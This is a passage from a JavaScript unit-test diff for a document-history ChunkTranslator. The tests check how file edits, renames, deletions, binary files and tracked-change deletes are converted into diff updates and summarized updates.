(param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal(this.fileContents) + expect(updates).to.deep.equal([ + { + op: [{ i: 'bar', p: 6 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 2, + }, + { + op: [{ i: 'baz', p: 9 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 3, + }, + ]) + done() + } + ) + }) + }) + + describe('convertToSummarizedUpdates', function () { + it('should return a summary which includes the addition', function (done) { + const assertion = (error, updates) => { + expect(error).to.be.null + expect(updates).to.deep.equal([ + { + pathnames: ['main.tex'], + project_ops: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + { + pathnames: [], + project_ops: [ + { + add: { + pathname: 'new.tex', + }, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 1, + }, + { + pathnames: ['new.tex'], + project_ops: [], 
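+              // once the file exists, edits to new.tex show up under
+              // pathnames rather than project_ops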
+ meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 2, + }, + { + pathnames: ['new.tex'], + project_ops: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 3, + }, + ]) + done() + } + + this.ChunkTranslator.convertToSummarizedUpdates(this.chunk, assertion) + }) + }) + }) + + describe('when the file is renamed during the chunk', function () { + beforeEach(function () { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [{ pathname: 'main.tex', textOperation: ['foo'] }], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { pathname: 'main.tex', newPathname: 'moved.tex' }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { pathname: 'moved.tex', textOperation: [3, 'bar'] }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { pathname: 'moved.tex', newPathname: 'moved_again.tex' }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { pathname: 'moved_again.tex', textOperation: [6, 'baz'] }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1], + } + }) + + describe('convertToDiffUpdates', function () { + it('uses the original pathname before it is moved', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 5, + (error, param) => { + if (param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal(this.fileContents) + expect(updates).to.deep.equal([ + { + op: [{ i: 'foo', p: 0 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + { + op: [{ i: 'bar', p: 3 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 2, + }, + { + op: [{ i: 'baz', p: 6 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 4, + }, + ]) + done() + } + ) + }) + + it('uses the original pathname for before the move change', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 1, + 5, + (error, param) => { + if (param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal('foo' + this.fileContents) + expect(updates).to.deep.equal([ + { + op: [{ i: 'bar', p: 3 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 2, + }, + { + op: [{ i: 'baz', p: 6 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 4, + }, + ]) + done() + } + ) + }) + + it('uses the new pathname for after the move change', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'moved.tex', + 2, + 5, + (error, param) => { + if (param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal('foo' + this.fileContents) + 
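+            // fromVersion is 2, so the 'foo' inserted at v0 is already
+            // baked into the initial content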
expect(updates).to.deep.equal([ + { + op: [{ i: 'bar', p: 3 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 2, + }, + { + op: [{ i: 'baz', p: 6 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 4, + }, + ]) + done() + } + ) + }) + + it('tracks multiple renames', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'moved_again.tex', + 4, + 5, + (error, param) => { + if (param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal('foobar' + this.fileContents) + expect(updates).to.deep.equal([ + { + op: [{ i: 'baz', p: 6 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 4, + }, + ]) + done() + } + ) + }) + + it('returns an error when referring to a file that is now moved', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 4, + 5, + error => { + expect(error.message).to.equal( + "pathname 'main.tex' not found in range" + ) + done() + } + ) + }) + }) + + describe('convertToSummarizedUpdates', function () { + it('should return a summary which includes the rename', function (done) { + const assertion = (error, updates) => { + expect(error).to.be.null + expect(updates).to.deep.equal([ + { + pathnames: ['main.tex'], + project_ops: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + { + pathnames: [], + project_ops: [ + { + rename: { + pathname: 'main.tex', + newPathname: 'moved.tex', + }, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 1, + }, + { + pathnames: ['moved.tex'], + project_ops: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 2, + }, + { + pathnames: [], + project_ops: [ + { + rename: { + pathname: 'moved.tex', + newPathname: 'moved_again.tex', + }, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 3, + }, + { + pathnames: ['moved_again.tex'], + project_ops: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 4, + }, + ]) + done() + } + + this.ChunkTranslator.convertToSummarizedUpdates(this.chunk, assertion) + }) + }) + }) + + describe('when the file is deleted during the chunk', function () { + beforeEach(function () { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + stringLength: 42, + }, + 'other.tex': { + hash: this.fileHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [{ pathname: 'main.tex', textOperation: ['foo'] }], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [{ pathname: 'main.tex', newPathname: '' }], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [{ pathname: 'other.tex', textOperation: ['foo'] }], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1], + } + }) + + describe('convertToDiffUpdates', function () { + it('returns updates up to when it is deleted', function (done) { + 
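+        // the delete at v1 is modelled as a rename to the empty pathname
+        // (newPathname: ''), after which main.tex no longer exists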
this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 3, + (error, param) => { + if (param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal(this.fileContents) + expect(updates).to.deep.equal([ + { + op: [{ i: 'foo', p: 0 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + ]) + done() + } + ) + }) + + it('returns nothing if fromVersion is when is it was deleted', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 1, + 3, + (error, param) => { + if (param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal('foo' + this.fileContents) + expect(updates).to.deep.equal([]) + done() + } + ) + }) + + it('returns an error requesting changes after deleted', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 2, + 3, + error => { + expect(error.message).to.equal( + "pathname 'main.tex' not found in range" + ) + done() + } + ) + }) + }) + + describe('convertToSummarizedUpdates', function () { + it('should return a summary which includes the delete', function (done) { + const assertion = (error, updates) => { + expect(error).to.be.null + expect(updates).to.deep.equal([ + { + pathnames: ['main.tex'], + project_ops: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + { + pathnames: [], + project_ops: [ + { + remove: { + pathname: 'main.tex', + }, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 1, + }, + { + pathnames: ['other.tex'], + project_ops: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 2, + }, + ]) + done() + } + + this.ChunkTranslator.convertToSummarizedUpdates(this.chunk, assertion) + }) + }) + }) + + describe("with text operations applied to files that don't exist", function (done) { + beforeEach(function () { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'not_here.tex', + textOperation: [3, 'Hello world'], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id, undefined], + }, + ], + }, + }, + authors: [this.author1], + } + }) + + describe('convertToSummarizedUpdates', function () { + it('should return an empty diff instead of an error', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'not_here.tex', + 0, + 1, + (error, result) => { + expect(error).to.equal(null) + expect(result.updates.length).to.equal(0) + done() + } + ) + }) + }) + }) + + describe("with rename operations applied to files that don't exist", function (done) { + beforeEach(function () { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { pathname: 'not_here.tex', newPathname: 'blah.tex' }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id, undefined], + }, + ], + }, + }, + authors: [this.author1], + } + }) + + 
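+    // as with text operations on unknown files above, a rename of a pathname
+    // that is not in the snapshot yields an empty diff rather than an error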
describe('convertToSummarizedUpdates', function () { + it('should return an empty diff instead of an error', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'not_here.tex', + 0, + 1, + (error, result) => { + expect(error).to.equal(null) + expect(result.updates.length).to.equal(0) + done() + } + ) + }) + }) + }) + + describe("with remove operations applied to files that don't exist", function (done) { + beforeEach(function () { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [{ pathname: 'not_here.tex', newPathname: '' }], + timestamp: this.date.toISOString(), + authors: [this.author1.id, undefined], + }, + ], + }, + }, + authors: [this.author1], + } + }) + + describe('convertToSummarizedUpdates', function () { + it('should return an empty diff instead of an error', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'not_here.tex', + 0, + 1, + (error, result) => { + expect(error).to.equal(null) + expect(result.updates.length).to.equal(0) + done() + } + ) + }) + }) + }) + + describe('with multiple operations in one change', function () { + beforeEach(function () { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + stringLength: 42, + }, + 'other.tex': { + hash: this.fileHash, + stringLength: 42, + }, + 'old.tex': { + hash: this.fileHash, + stringLength: 42, + }, + 'deleted.tex': { + hash: this.fileHash, + stringLength: 42, + }, + }, + }, + + changes: [ + { + operations: [ + { pathname: 'main.tex', textOperation: ['Hello test, ', -6] }, + { pathname: 'main.tex', textOperation: [6, 'foo '] }, + { pathname: 'other.tex', textOperation: [6, 'foo '] }, + { pathname: 'old.tex', newPathname: 'new.tex' }, + { pathname: 'deleted.tex', newPathname: '' }, + { + pathname: 'created.tex', + file: { hash: this.fileHash, stringLength: 10 }, + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [{ pathname: 'main.tex', textOperation: [6, -4] }], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1], + } + }) + + describe('convertToDiffUpdates', function () { + it('should can return multiple ops from the same version', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 2, + (error, param) => { + if (param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal(this.fileContents) + expect(updates).to.deep.equal([ + { + op: [ + { i: 'Hello test, ', p: 0 }, + { d: 'Hello ', p: 12 }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + { + op: [{ i: 'foo ', p: 6 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + { + op: [{ d: 'foo ', p: 6 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 1, + }, + ]) + done() + } + ) + }) + + it('should return the correct initial text if there are previous changes', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 1, + 2, + (error, param) => { + if (param == 
null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal( + 'Hello foo test, world, this is a test' + ) + expect(updates).to.deep.equal([ + { + op: [{ d: 'foo ', p: 6 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 1, + }, + ]) + done() + } + ) + }) + }) + + describe('convertToSummarizedUpdates', function () { + it('should return a summary of containing multiple changes', function (done) { + const assertion = (error, updates) => { + expect(error).to.be.null + expect(updates).to.deep.equal([ + { + pathnames: ['main.tex', 'other.tex'], + project_ops: [ + { + rename: { + pathname: 'old.tex', + newPathname: 'new.tex', + }, + }, + { + remove: { + pathname: 'deleted.tex', + }, + }, + { + add: { + pathname: 'created.tex', + }, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + { + pathnames: ['main.tex'], + project_ops: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 1, + }, + ]) + done() + } + + this.ChunkTranslator.convertToSummarizedUpdates(this.chunk, assertion) + }) + }) + }) + + describe('with a binary file', function () { + beforeEach(function () { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + stringLength: 42, + }, + 'binary.tex': { + hash: this.fileHash, + byteLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { pathname: 'main.tex', textOperation: ['Hello test, ', -6] }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1.id], + } + }) + + describe('convertToDiffUpdates', function () { + it('should convert them to a binary diff', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'binary.tex', + 0, + 1, + (error, diff) => { + expect(error).to.be.null + expect(diff).to.deep.equal({ binary: true }) + done() + } + ) + }) + }) + }) + + describe('with v2 author ids', function () { + beforeEach(function () { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { pathname: 'main.tex', textOperation: ['Hello test, ', -6] }, + ], + timestamp: this.date.toISOString(), + v2Authors: [(this.v2AuthorId = '123456789')], + }, + ], + }, + }, + } + }) + + describe('convertToDiffUpdates', function () { + it('should return the v2 author id in the users array', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 1, + (error, diff) => { + expect(error).to.be.null + expect(diff.updates).to.deep.equal([ + { + op: [ + { i: 'Hello test, ', p: 0 }, + { d: 'Hello ', p: 12 }, + ], + meta: { + users: [this.v2AuthorId], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + ]) + done() + } + ) + }) + }) + + describe('convertToSummarizedUpdates', function () { + it('should return the v2 author id in the users array', function (done) { + const assertion = (error, updateSet) => { + expect(error).to.be.null + expect(updateSet).to.deep.equal([ + { + pathnames: ['main.tex'], + project_ops: [], + meta: { + users: [this.v2AuthorId], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + 
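+              // v2 author ids are opaque strings and are passed through to
+              // the users array unchanged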
}, + ]) + done() + } + this.ChunkTranslator.convertToSummarizedUpdates(this.chunk, assertion) + }) + }) + }) + + describe('with tracked changes in a file', function () { + describe('convertToDiffUpdates', function () { + beforeEach(function () { + this.rangesHash = 'some_ranges_hash' + this.fileContents = 'Hello planet world, this is a test' + this.ranges = JSON.stringify({ + trackedChanges: [ + { + range: { pos: 6, length: 7 }, + tracking: { + type: 'delete', + userId: this.author1.id, + ts: '2024-01-01T00:00:00.000Z', + }, + }, + ], + }) + this.HistoryStoreManager.getProjectBlob + .withArgs(this.historyId, this.rangesHash) + .yields(null, this.ranges) + this.HistoryStoreManager.getProjectBlob + .withArgs(this.historyId, this.fileHash) + .yields(null, this.fileContents) + }) + + it('should filter out the tracked deletes that were present in the chunk', function (done) { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + rangesHash: this.rangesHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] is a tracked delete + 28, // Hello [planet ]world, this is |a test + -1, // Hello [planet ]world, this is | test + 'the', // Hello [planet ]world, this is the| test + 5, // Hello [planet ]world, this is the test| + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1.id], + } + + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 1, + (error, diff) => { + expect(error).to.be.null + expect(diff.initialContent).to.equal('Hello world, this is a test') + expect(diff.updates).to.deep.equal([ + { + op: [ + { i: 'the', p: 21 }, + { d: 'a', p: 24 }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + ]) + done() + } + ) + }) + + it('should filter out tracked deletes across multiple changes', function (done) { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + rangesHash: this.rangesHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] is a tracked delete + 28, // Hello [planet ]world, this is |a test + -1, // Hello [planet ]world, this is | test + 'the', // Hello [planet ]world, this is the| test + 5, // Hello [planet ]world, this is the test| + ], + }, + { + pathname: 'main.tex', + textOperation: [ + // [...] 
is a tracked delete + 22, // Hello [planet ]world, th|is is the test + -2, // Hello [planet ]world, th| is the test + 'at', // Hello [planet ]world, that| is the test + 12, // Hello [planet ]world, that is the test| + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1.id], + } + + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 1, + (error, diff) => { + expect(error).to.be.null + expect(diff.initialContent).to.equal('Hello world, this is a test') + expect(diff.updates).to.deep.equal([ + { + op: [ + { i: 'the', p: 21 }, + { d: 'a', p: 24 }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + { + op: [ + { i: 'at', p: 15 }, + { d: 'is', p: 17 }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + ]) + done() + } + ) + }) + + it('should handle tracked delete in the operation', function (done) { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + rangesHash: this.rangesHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] is a tracked delete + 5, // Hello| [planet ]world, this is a test + { + r: 1, + tracking: { + type: 'delete', + userId: this.author1.id, + ts: '2024-01-01T00:00:00.000Z', + }, + }, // Hello[ ]|[planet ]world, this is test + 7, // Hello[ ][planet ]|world, this is the test + { + r: 5, + tracking: { + type: 'delete', + userId: this.author1.id, + ts: '2024-01-01T00:00:00.000Z', + }, + }, // Hello[ ][planet ][world]|, this is the test + 18, // Hello[ ][planet ][world], this is the test| + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1.id], + } + + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 1, + (error, diff) => { + expect(error).to.be.null + expect(diff.initialContent).to.equal('Hello world, this is a test') + expect(diff.updates).to.deep.equal([ + { + op: [ + { d: ' ', p: 5 }, + { d: 'world', p: 5 }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + ]) + done() + } + ) + }) + + it('should filter out tracked deletes in insert operations', function (done) { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + rangesHash: this.rangesHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] 
is a tracked delete + 13, // Hello [planet ]|world, this is a test + { + i: 'pluto', + tracking: { + type: 'delete', + userId: this.author1.id, + ts: '2024-01-01T00:00:00.000Z', + }, + }, // Hello [planet pluto]|world, this is a test + 21, // Hello [planet pluto]world, this is a test| + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1.id], + } + + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 1, + (error, diff) => { + expect(error).to.be.null + expect(diff.initialContent).to.equal('Hello world, this is a test') + expect(diff.updates).to.deep.equal([ + { + op: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + ]) + done() + } + ) + }) + + it('should filter out tracked deletes in delete operations', function (done) { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + rangesHash: this.rangesHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] is a tracked delete + 6, // Hello |[planet ]world, this is a test + -3, // Hello [|net ]world, this is a test + 6, // Hello [net ]wo|rld, this is a test + -3, // Hello [net ]wo|, this is a test + 16, // Hello [net ]wo, this is a test| + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1.id], + } + + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 1, + (error, diff) => { + expect(error).to.be.null + expect(diff.initialContent).to.equal('Hello world, this is a test') + expect(diff.updates).to.deep.equal([ + { + op: [{ d: 'rld', p: 8 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + ]) + done() + } + ) + }) + + it('should filter out tracked deletes in retain operations', function (done) { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + rangesHash: this.rangesHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] 
is a tracked delete + 4, // Hell|o [planet ]world, this is a test + { + r: 4, + tracking: { type: 'none' }, + }, // Hello pl|[anet ]world, this is a test + { + r: 3, + tracking: { + type: 'insert', + userId: this.author1.id, + ts: '2024-01-01T00:00:00.000Z', + }, + }, // Hello plane|[t ]world, this is a test + 23, // Hello plane[t ]world, this is a test| + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1.id], + } + + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 1, + (error, diff) => { + expect(error).to.be.null + expect(diff.initialContent).to.equal('Hello world, this is a test') + expect(diff.updates).to.deep.equal([ + { + op: [ + { + i: 'pl', + p: 6, + }, + { + i: 'ane', + p: 8, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + ]) + done() + } + ) + }) + + it('should report tracked deletion (retains) as deletions', function (done) { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + rangesHash: this.rangesHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] is a tracked delete + { + r: 34, + tracking: { + type: 'delete', + userId: this.author1.id, + ts: '2024-01-01T00:00:00.000Z', + }, + }, // [Hello planet world, this is a test]| + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1.id], + } + + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 1, + (error, diff) => { + expect(error).to.be.null + expect(diff.initialContent).to.equal('Hello world, this is a test') + expect(diff.updates).to.deep.equal([ + { + op: [ + { + d: 'Hello ', + p: 0, + }, + { + d: 'world, this is a test', + p: 0, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + ]) + done() + } + ) + }) + + it('should properly create changes when deleting after moved track deletes', function (done) { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + stringLength: 34, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] is a tracked delete + // // He[ll]o planet world, this is a test + 2, + { + r: 2, + tracking: { + type: 'delete', + userId: this.author1.id, + ts: this.date.toISOString(), + }, + }, + 30, + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] is a tracked delete + // {...} is a tracked insert + // He[ll]o {TEST }planet world, this is a test + 6, + { + i: 'TEST ', + tracking: { + type: 'insert', + userId: this.author1.id, + ts: this.date.toISOString(), + }, + }, + 28, + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] 
is a tracked delete + // {...} is a tracked insert + // He[ll]o {TEST }planet world, [this] is a test + 25, + { + r: 4, + tracking: { + type: 'delete', + userId: this.author1.id, + ts: this.date.toISOString(), + }, + }, + 10, + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] is a tracked delete + // {...} is a tracked insert + 2, // He|[ll]o {TEST }planet world, [this] is a test + -2, // He|o {TEST }planet world, [this] is a test + 2, // Heo |{TEST }planet world, [this] is a test + { + r: 5, + tracking: { type: 'none' }, + }, // Heo TEST| planet world, [this] is a test + 14, // Heo TEST planet world, |[this] is a test + -4, // Heo TEST planet world, | is a test + 10, // Heo TEST planet world, is a test| + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1.id], + } + + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 4, + (error, diff) => { + expect(error).to.be.null + expect(diff.updates).to.deep.equal([ + { + op: [ + { + d: 'll', + p: 2, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + { + op: [ + { + i: 'TEST ', + p: 4, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 1, + }, + { + op: [ + { + d: 'this', + p: 23, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 2, + }, + { + op: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 3, + }, + ]) + done() + } + ) + }) + + it('should properly create changes when retaining after moved track deletes', function (done) { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + stringLength: 34, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] is a tracked delete + // // He[ll]o planet world, this is a test + 2, + { + r: 2, + tracking: { + type: 'delete', + userId: this.author1.id, + ts: this.date.toISOString(), + }, + }, + 30, + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] is a tracked delete + // 